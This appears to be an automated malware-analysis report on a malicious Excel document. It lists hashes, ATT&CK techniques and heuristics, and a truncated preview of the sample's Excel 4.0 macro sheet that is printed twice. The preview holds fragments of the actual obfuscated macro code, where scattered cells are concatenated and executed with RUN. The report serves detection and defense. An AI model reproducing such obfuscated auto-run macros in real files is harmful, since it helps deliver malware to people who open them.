Office (OOXML) malware analysis — malicious · 9558888802328b2c

MALICIOUS

Office (OOXML)

17.6 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-09-07

MD5: 1e9e8639488e2bc27b48f0a2c217d622 SHA-1: 73a83a49dc6e9120887474473a1c76ea49f4bf28 SHA-256: 9558888802328b2c1cf0daa8ea2b1348da187d3853cf5ddd39f3a6eedde9c9cb

182 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an Excel document containing Excel 4.0 macros, indicated by the 'xlm_macrosheet' and 'xlm_autoopen_definedname' heuristics. The macros utilize dangerous functions like 'CALL' and 'RUN' to execute arbitrary code. The document body contains a lure to enable editing and content, and an obfuscated URL 'the embedded link' is present, likely for downloading a second-stage payload. This combination strongly suggests a malicious document designed for initial compromise via spearphishing.

Heuristics 4

Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME

Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
Dangerous XLM formula APIs: RUN, RETURN, CALL, HALT critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 42722 bytes

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	42722 bytes
SHA-256: `5da131280f3eb792390f1d57ba325826dcf30294cf60d9f284a8096af3742b4f`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A65:IO59838"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><sheetData><row r="65" spans="65:65" x14ac:dyDescent="0.25"><c r="BM65"><v>42790</v></c></row><row r="66" spans="65:65" x14ac:dyDescent="0.25"><c r="BM66"><v>25</v></c></row><row r="265" spans="209:209" x14ac:dyDescent="0.25"><c r="HA265" t="s"><v>12</v></c></row><row r="657" spans="211:211" x14ac:dyDescent="0.25"><c r="HC657" t="s"><v>30</v></c></row><row r="732" spans="74:74" x14ac:dyDescent="0.25"><c r="BV732" t="s"><v>32</v></c></row><row r="741" spans="162:162" x14ac:dyDescent="0.25"><c r="FF741" t="s"><v>11</v></c></row><row r="963" spans="162:162" x14ac:dyDescent="0.25"><c r="FF963"><v>3</v></c></row><row r="1266" spans="139:139" x14ac:dyDescent="0.25"><c r="EI1266" t="s"><v>45</v></c></row><row r="1531" spans="229:229" x14ac:dyDescent="0.25"><c r="HU1531" t="b"><f bx="1">HxoCMuuiUvSe=$EI$1266&$FH$28903&$CU$6500&$EK$32740&$BZ$22136&$H$26831</f><v>0</v></c></row><row r="1532" spans="229:229" x14ac:dyDescent="0.25"><c r="HU1532" t="b"><f bx="1">sardhIvsmFCZu=$FG$50321</f><v>0</v></c></row><row r="1533" spans="229:229" x14ac:dyDescent="0.25"><c r="HU1533" t="b"><f>$IF$41831()</f><v>0</v></c></row><row r="1534" spans="229:229" x14ac:dyDescent="0.25"><c r="HU1534" t="b"><f>RUN($HL$17319)</f><v>0</v></c></row><row r="2053" spans="40:40" x14ac:dyDescent="0.25"><c r="AN2053" t="b"><f bx="1">HxoCMuuiUvSe=$EY$45248&$ED$23691&$AR$53563&$N$29849&$V$23783&$DX$4218&$Y$54889&$EM$31731&$HM$41911&$IB$27675&$BY$59232&$BC$36839&$DE$25292&$FR$9736&$H$31251&$J$52064&$HC$5497&$BE$58635</f><v>0</v></c></row><row r="2054" spans="40:40" x14ac:dyDescent="0.25"><c r="AN2054" t="b"><f bx="1">sardhIvsmFCZu=$GI$39099</f><v>0</v></c></row><row r="2055" spans="40:40" x14ac:dyDescent="0.25"><c r="AN2055" t="b"><f>$IF$41831()</f><v>0</v></c></row><row r="2056" spans="40:40" x14ac:dyDescent="0.25"><c r="AN2056" t="b"><f>RUN($DO$7275)</f><v>0</v></c></row><row r="2380" spans="22:22" x14ac:dyDescent="0.25"><c r="V2380" t="s"><v>11</v></c></row><row r="2536" spans="165:165" x14ac:dyDescent="0.25"><c r="FI2536" t="s"><v>18</v></c></row><row r="2636" spans="199:199" x14ac:dyDescent="0.25"><c r="GQ2636" t="s"><v>1</v></c></row><row r="2756" spans="206:206" x14ac:dyDescent="0.25"><c r="GX2756" t="s"><v>11</v></c></row><row r="3029" spans="187:200" x14ac:dyDescent="0.25"><c r="GE3029" t="s"><v>32</v></c></row><row r="3034" spans="187:200" x14ac:dyDescent="0.25"><c r="GR3034" t="s"><v>24</v></c></row><row r="3565" spans="47:47" x14ac:dyDescent="0.25"><c r="AU3565" t="s"><v>34</v></c></row><row r="3701" spans="87:87" x14ac:dyDescent="0.25"><c r="CI3701" t="s"><v>39</v></c></row><row r="3965" spans="60:60" x14ac:dyDescent="0.25"><c r="BH3965" t="s"><v>2</v></c></row><row r="4218" spans="128:128" x14ac:dyDescent="0.25"><c r="DX4218" t="s"><v>20</v></c></row><row r="4274" spans="209:209" x14ac:dyDescent="0.25"><c r="HA4274" t="s"><v>19</v></c></row><row r="5162" spans="135:135" x14ac:dyDescent="0.25"><c r="EE5162" t="s"><v>12</v></c></row><row r="5172" spans="245:245" x14ac:dyDescent="0.25"><c r="IK5172" t="s"><v>32</v></c></row><row r="5456" spans="81:81" x14ac:dyDescent="0.25"><c r="CC5456" t="s"><v>14</v></c></row><row r="5497" spans="211:211" x14ac:dyDescent="0.25"><c r="HC5497" t="s"><v>10</v></c></row><row r="5745" spans="172:172" x14ac:dyDescent="0.25"><c r="FP5745" t="s"><v>32</v></c></row><row r="5777" spans="92:92" x14ac:dyDescent="0.25"><c r="CN5777" t="s"><v>22</v>< ... (truncated)

SHA-256: 5da131280f3eb792390f1d57ba325826dcf30294cf60d9f284a8096af3742b4f

Preview script

First 1,000 lines of the extracted script

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A65:IO59838"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><sheetData><row r="65" spans="65:65" x14ac:dyDescent="0.25"><c r="BM65"><v>42790</v></c></row><row r="66" spans="65:65" x14ac:dyDescent="0.25"><c r="BM66"><v>25</v></c></row><row r="265" spans="209:209" x14ac:dyDescent="0.25"><c r="HA265" t="s"><v>12</v></c></row><row r="657" spans="211:211" x14ac:dyDescent="0.25"><c r="HC657" t="s"><v>30</v></c></row><row r="732" spans="74:74" x14ac:dyDescent="0.25"><c r="BV732" t="s"><v>32</v></c></row><row r="741" spans="162:162" x14ac:dyDescent="0.25"><c r="FF741" t="s"><v>11</v></c></row><row r="963" spans="162:162" x14ac:dyDescent="0.25"><c r="FF963"><v>3</v></c></row><row r="1266" spans="139:139" x14ac:dyDescent="0.25"><c r="EI1266" t="s"><v>45</v></c></row><row r="1531" spans="229:229" x14ac:dyDescent="0.25"><c r="HU1531" t="b"><f bx="1">HxoCMuuiUvSe=$EI$1266&amp;$FH$28903&amp;$CU$6500&amp;$EK$32740&amp;$BZ$22136&amp;$H$26831</f><v>0</v></c></row><row r="1532" spans="229:229" x14ac:dyDescent="0.25"><c r="HU1532" t="b"><f bx="1">sardhIvsmFCZu=$FG$50321</f><v>0</v></c></row><row r="1533" spans="229:229" x14ac:dyDescent="0.25"><c r="HU1533" t="b"><f>$IF$41831()</f><v>0</v></c></row><row r="1534" spans="229:229" x14ac:dyDescent="0.25"><c r="HU1534" t="b"><f>RUN($HL$17319)</f><v>0</v></c></row><row r="2053" spans="40:40" x14ac:dyDescent="0.25"><c r="AN2053" t="b"><f bx="1">HxoCMuuiUvSe=$EY$45248&amp;$ED$23691&amp;$AR$53563&amp;$N$29849&amp;$V$23783&amp;$DX$4218&amp;$Y$54889&amp;$EM$31731&amp;$HM$41911&amp;$IB$27675&amp;$BY$59232&amp;$BC$36839&amp;$DE$25292&amp;$FR$9736&amp;$H$31251&amp;$J$52064&amp;$HC$5497&amp;$BE$58635</f><v>0</v></c></row><row r="2054" spans="40:40" x14ac:dyDescent="0.25"><c r="AN2054" t="b"><f bx="1">sardhIvsmFCZu=$GI$39099</f><v>0</v></c></row><row r="2055" spans="40:40" x14ac:dyDescent="0.25"><c r="AN2055" t="b"><f>$IF$41831()</f><v>0</v></c></row><row r="2056" spans="40:40" x14ac:dyDescent="0.25"><c r="AN2056" t="b"><f>RUN($DO$7275)</f><v>0</v></c></row><row r="2380" spans="22:22" x14ac:dyDescent="0.25"><c r="V2380" t="s"><v>11</v></c></row><row r="2536" spans="165:165" x14ac:dyDescent="0.25"><c r="FI2536" t="s"><v>18</v></c></row><row r="2636" spans="199:199" x14ac:dyDescent="0.25"><c r="GQ2636" t="s"><v>1</v></c></row><row r="2756" spans="206:206" x14ac:dyDescent="0.25"><c r="GX2756" t="s"><v>11</v></c></row><row r="3029" spans="187:200" x14ac:dyDescent="0.25"><c r="GE3029" t="s"><v>32</v></c></row><row r="3034" spans="187:200" x14ac:dyDescent="0.25"><c r="GR3034" t="s"><v>24</v></c></row><row r="3565" spans="47:47" x14ac:dyDescent="0.25"><c r="AU3565" t="s"><v>34</v></c></row><row r="3701" spans="87:87" x14ac:dyDescent="0.25"><c r="CI3701" t="s"><v>39</v></c></row><row r="3965" spans="60:60" x14ac:dyDescent="0.25"><c r="BH3965" t="s"><v>2</v></c></row><row r="4218" spans="128:128" x14ac:dyDescent="0.25"><c r="DX4218" t="s"><v>20</v></c></row><row r="4274" spans="209:209" x14ac:dyDescent="0.25"><c r="HA4274" t="s"><v>19</v></c></row><row r="5162" spans="135:135" x14ac:dyDescent="0.25"><c r="EE5162" t="s"><v>12</v></c></row><row r="5172" spans="245:245" x14ac:dyDescent="0.25"><c r="IK5172" t="s"><v>32</v></c></row><row r="5456" spans="81:81" x14ac:dyDescent="0.25"><c r="CC5456" t="s"><v>14</v></c></row><row r="5497" spans="211:211" x14ac:dyDescent="0.25"><c r="HC5497" t="s"><v>10</v></c></row><row r="5745" spans="172:172" x14ac:dyDescent="0.25"><c r="FP5745" t="s"><v>32</v></c></row><row r="5777" spans="92:92" x14ac:dyDescent="0.25"><c r="CN5777" t="s"><v>22</v><
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.